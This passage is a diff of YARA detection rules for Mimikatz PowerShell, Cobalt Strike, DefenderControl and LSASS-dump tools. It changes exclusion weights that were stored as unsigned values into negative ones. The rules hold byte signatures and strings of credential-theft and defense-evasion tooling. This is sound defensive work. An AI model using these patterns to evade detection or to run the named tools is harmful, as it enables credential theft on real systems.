$a_80_11 = {5c 6d 63 61 66 65 65 5c 65 6e 64 70 6f 69 6e 74 20 73 65 63 75 72 69 74 79 5c } //\mcafee\endpoint security\ 65516
|
||||
$a_80_12 = {5c 74 68 72 65 61 74 20 70 72 65 76 65 6e 74 69 6f 6e 5c 69 70 73 5c 68 69 70 68 61 6e 64 6c 65 72 73 } //\threat prevention\ips\hiphandlers 65516
|
||||
$a_80_13 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
|
||||
$a_80_14 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
|
||||
$a_80_15 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
|
||||
$a_80_16 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
|
||||
$a_80_8 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
|
||||
$a_80_9 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
|
||||
$a_80_10 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
|
||||
$a_80_11 = {5c 6d 63 61 66 65 65 5c 65 6e 64 70 6f 69 6e 74 20 73 65 63 75 72 69 74 79 5c } //\mcafee\endpoint security\ -20
|
||||
$a_80_12 = {5c 74 68 72 65 61 74 20 70 72 65 76 65 6e 74 69 6f 6e 5c 69 70 73 5c 68 69 70 68 61 6e 64 6c 65 72 73 } //\threat prevention\ips\hiphandlers -20
|
||||
$a_80_13 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
|
||||
$a_80_14 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
|
||||
$a_80_15 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
|
||||
$a_80_16 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*2+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516+(#a_80_13 & 1)*65516+(#a_80_14 & 1)*65516+(#a_80_15 & 1)*65516+(#a_80_16 & 1)*65516) >=7
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*2+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20+(#a_80_13 & 1)*-20+(#a_80_14 & 1)*-20+(#a_80_15 & 1)*-20+(#a_80_16 & 1)*-20) >=7
|
||||
|
||||
}
|
||||
rule HackTool_PowerShell_Mikatz_dha__2{
|
||||
|
|
@ -36,17 +36,17 @@ rule HackTool_PowerShell_Mikatz_dha__2{
|
|||
$a_00_3 = {24 00 50 00 45 00 42 00 79 00 74 00 65 00 73 00 33 00 32 00 } //1 $PEBytes32
|
||||
$a_00_4 = {2e 00 44 00 65 00 66 00 69 00 6e 00 65 00 46 00 69 00 65 00 6c 00 64 00 28 00 27 00 56 00 69 00 72 00 74 00 75 00 61 00 6c 00 41 00 64 00 64 00 72 00 65 00 73 00 73 00 27 00 2c 00 20 00 5b 00 55 00 49 00 6e 00 74 00 33 00 32 00 5d 00 } //1 .DefineField('VirtualAddress', [UInt32]
|
||||
$a_00_5 = {2e 00 47 00 65 00 74 00 4d 00 65 00 74 00 68 00 6f 00 64 00 28 00 27 00 47 00 65 00 74 00 50 00 72 00 6f 00 63 00 41 00 64 00 64 00 72 00 65 00 73 00 73 00 27 00 } //1 .GetMethod('GetProcAddress'
|
||||
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
|
||||
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
|
||||
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
|
||||
$a_80_9 = {5c 6d 63 61 66 65 65 5c 65 6e 64 70 6f 69 6e 74 20 73 65 63 75 72 69 74 79 5c } //\mcafee\endpoint security\ 65516
|
||||
$a_80_10 = {5c 74 68 72 65 61 74 20 70 72 65 76 65 6e 74 69 6f 6e 5c 69 70 73 5c 68 69 70 68 61 6e 64 6c 65 72 73 } //\threat prevention\ips\hiphandlers 65516
|
||||
$a_80_11 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
|
||||
$a_80_12 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
|
||||
$a_80_13 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
|
||||
$a_80_14 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
|
||||
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
|
||||
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
|
||||
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
|
||||
$a_80_9 = {5c 6d 63 61 66 65 65 5c 65 6e 64 70 6f 69 6e 74 20 73 65 63 75 72 69 74 79 5c } //\mcafee\endpoint security\ -20
|
||||
$a_80_10 = {5c 74 68 72 65 61 74 20 70 72 65 76 65 6e 74 69 6f 6e 5c 69 70 73 5c 68 69 70 68 61 6e 64 6c 65 72 73 } //\threat prevention\ips\hiphandlers -20
|
||||
$a_80_11 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
|
||||
$a_80_12 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
|
||||
$a_80_13 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
|
||||
$a_80_14 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_80_6 & 1)*65516+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516+(#a_80_13 & 1)*65516+(#a_80_14 & 1)*65516) >=6
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_80_6 & 1)*-20+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20+(#a_80_13 & 1)*-20+(#a_80_14 & 1)*-20) >=6
|
||||
|
||||
}
|
||||
rule HackTool_PowerShell_Mikatz_dha__3{
|
||||
|
|
|
|||
|
|
@ -10,11 +10,11 @@ rule HackTool_Win32_CobaltStrike_B{
|
|||
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
|
||||
$a_03_4 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
|
||||
$a_03_5 = {33 c9 41 51 6a 02 58 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 51 50 ff 33 51 50 ff 75 90 01 01 51 50 68 a2 90 00 } //10
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -9,11 +9,11 @@ rule HackTool_Win32_CobaltStrike_B_{
|
|||
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
|
||||
$a_03_3 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
|
||||
$a_03_4 = {33 c9 41 51 6a 02 58 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 51 50 ff 33 51 50 ff 75 90 01 01 51 50 68 a2 90 00 } //10
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -10,11 +10,11 @@ rule HackTool_Win32_CobaltStrike_C{
|
|||
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
|
||||
$a_03_4 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
|
||||
$a_03_5 = {40 3d 00 10 00 00 7c f1 90 09 07 00 80 90 01 05 90 17 03 01 01 01 2e 69 4e 40 90 00 } //10
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -9,11 +9,11 @@ rule HackTool_Win32_CobaltStrike_C_{
|
|||
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
|
||||
$a_03_3 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
|
||||
$a_03_4 = {40 3d 00 10 00 00 7c f1 90 09 07 00 80 90 01 05 90 03 01 01 2e 69 40 90 00 } //10
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -10,11 +10,11 @@ rule HackTool_Win32_CobaltStrike_D{
|
|||
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
|
||||
$a_03_4 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
|
||||
$a_03_5 = {68 00 00 10 00 90 02 3c 50 68 7f 66 04 40 ff 76 1c 90 02 08 81 7d fc fc ff 0f 00 90 00 } //10
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -9,11 +9,11 @@ rule HackTool_Win32_CobaltStrike_D_{
|
|||
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
|
||||
$a_03_3 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
|
||||
$a_03_4 = {68 00 00 10 00 90 02 3c 50 68 7f 66 04 40 ff 76 1c 90 02 08 81 7d fc fc ff 0f 00 90 00 } //10
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -7,13 +7,13 @@ rule HackTool_Win32_CobaltStrike_F{
|
|||
$a_03_0 = {33 d2 6a 0d 8b c1 5b f7 f3 8a 44 90 01 01 08 30 90 01 01 41 90 00 } //1
|
||||
$a_01_1 = {8b 3b 89 c8 31 d2 01 cf 41 89 7d e0 bf 0d 00 00 00 f7 f7 8a 44 13 08 8b 55 e0 30 02 } //1
|
||||
$a_01_2 = {8b 45 08 89 cf bb 0d 00 00 00 31 d2 03 38 89 c8 41 f7 f3 8b 45 08 8a 44 10 08 8a 44 10 08 30 07 } //1
|
||||
$a_01_3 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_4 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_5 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_6 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_7 = {7f 00 00 18 00 00 00 00 00 00 00 ff ff ff ff } //65436
|
||||
$a_01_8 = {f7 7f 00 00 2a 00 00 00 00 00 00 00 ff ff ff ff } //65436
|
||||
$a_01_3 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_4 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_5 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_6 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
$a_01_7 = {7f 00 00 18 00 00 00 00 00 00 00 ff ff ff ff } //-100
|
||||
$a_01_8 = {f7 7f 00 00 2a 00 00 00 00 00 00 00 ff ff ff ff } //-100
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=1
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=1
|
||||
|
||||
}
|
||||
|
|
@ -7,11 +7,11 @@ rule HackTool_Win32_CobaltStrike_F_{
|
|||
$a_03_0 = {33 d2 6a 0d 8b c1 5b f7 f3 8a 44 90 01 01 08 30 90 01 01 41 90 00 } //1
|
||||
$a_01_1 = {8b 3b 89 c8 31 d2 01 cf 41 89 7d e0 bf 0d 00 00 00 f7 f7 8a 44 13 08 8b 55 e0 30 02 } //1
|
||||
$a_01_2 = {8b 45 08 89 cf bb 0d 00 00 00 31 d2 03 38 89 c8 41 f7 f3 8b 45 08 8a 44 10 08 8a 44 10 08 30 07 } //1
|
||||
$a_01_3 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_4 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_5 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_6 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_3 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_4 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_5 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_6 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436) >=1
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100) >=1
|
||||
|
||||
}
|
||||
|
|
@ -5,8 +5,8 @@ rule HackTool_Win32_CobaltStrike_G{
|
|||
|
||||
strings :
|
||||
$a_03_0 = {08 00 00 00 00 00 00 00 00 01 90 01 07 01 90 01 07 02 90 01 07 02 90 01 07 01 90 01 0f 03 90 01 07 03 90 00 } //1
|
||||
$a_01_1 = {70 3f 00 47 0e 00 00 1c 04 00 00 e0 01 24 00 64 55 55 55 55 56 56 56 56 } //65436
|
||||
$a_01_1 = {70 3f 00 47 0e 00 00 1c 04 00 00 e0 01 24 00 64 55 55 55 55 56 56 56 56 } //-100
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*65436) >=1
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*-100) >=1
|
||||
|
||||
}
|
||||
|
|
@ -5,8 +5,8 @@ rule HackTool_Win32_CobaltStrike_G_{
|
|||
|
||||
strings :
|
||||
$a_03_0 = {08 00 00 00 00 00 00 00 00 01 90 01 07 01 90 01 07 02 90 01 07 02 90 01 07 01 90 01 0f 03 90 01 07 03 90 00 } //1
|
||||
$a_01_1 = {70 3f 00 47 0e 00 00 1c 04 00 00 e0 01 24 00 64 55 55 55 55 56 56 56 56 } //65436
|
||||
$a_01_1 = {70 3f 00 47 0e 00 00 1c 04 00 00 e0 01 24 00 64 55 55 55 55 56 56 56 56 } //-100
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*65436) >=1
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*-100) >=1
|
||||
|
||||
}
|
||||
|
|
@ -4,12 +4,12 @@ rule HackTool_Win32_Defendercontrol_C{
|
|||
description = "HackTool:Win32/Defendercontrol.C,SIGNATURE_TYPE_PEHSTR_EXT,0c 00 0c 00 05 00 00 "
|
||||
|
||||
strings :
|
||||
$a_80_0 = {4f 6e 65 43 79 62 65 72 } //OneCyber 65526
|
||||
$a_80_0 = {4f 6e 65 43 79 62 65 72 } //OneCyber -10
|
||||
$a_80_1 = {77 77 77 2e 73 6f 72 64 75 6d 2e 6f 72 67 } //www.sordum.org 10
|
||||
$a_80_2 = {64 43 6f 6e 74 72 6f 6c 2e 65 78 65 } //dControl.exe 1
|
||||
$a_80_3 = {64 66 43 6f 6e 74 72 6f 6c 2e 65 78 65 } //dfControl.exe 1
|
||||
$a_80_4 = {41 75 74 6f 49 74 } //AutoIt 1
|
||||
condition:
|
||||
((#a_80_0 & 1)*65526+(#a_80_1 & 1)*10+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1) >=12
|
||||
((#a_80_0 & 1)*-10+(#a_80_1 & 1)*10+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1) >=12
|
||||
|
||||
}
|
||||
|
|
@ -4,12 +4,12 @@ rule HackTool_Win32_DumpLsass_B{
|
|||
description = "HackTool:Win32/DumpLsass.B,SIGNATURE_TYPE_CMDHSTR_EXT,03 00 03 00 05 00 00 "
|
||||
|
||||
strings :
|
||||
